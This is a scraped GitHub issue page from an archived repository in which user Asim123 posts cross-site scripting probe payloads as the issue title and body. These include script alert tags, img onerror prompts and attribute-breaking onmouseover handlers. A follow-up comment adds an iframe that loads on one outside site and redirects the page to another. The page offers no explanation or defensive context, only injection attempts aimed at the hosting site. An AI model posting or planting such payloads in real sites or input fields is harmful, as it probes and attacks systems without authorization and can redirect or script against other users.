Skip to content
This repository has been archived by the owner on Jul 26, 2022. It is now read-only.

<script>alert(1)</script> #"><img src=M onerror=prompt(1);> t" onmouseover=alert(/xjjjjss/); a=" "onmouseover=prompt(/xss/)> "><script>confirm (/xss by asim/);</script> "><img src=x onerror=prompt("//XSS-By-M_Asim_Shahzad//");> #40

Closed
Asim123 opened this issue Nov 17, 2014 · 1 comment

Comments

@Asim123
Copy link

Asim123 commented Nov 17, 2014

<script>alert(1)</script>

">

t" onmouseover=alert(/xjjjjss/); a="
"onmouseover=prompt(/xss/)>
"><script>confirm (/xss by asim/);</script>
"><img src=x onerror=prompt("//XSS-By-M_Asim_Shahzad//");>

@Asim123
Copy link
Author

Asim123 commented Nov 17, 2014

'%3d'>"><iframe src='http://vulnerability-lab.com' onload=window.location=('http://evolution-sec.com')></iframe>/927

This issue was closed.
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant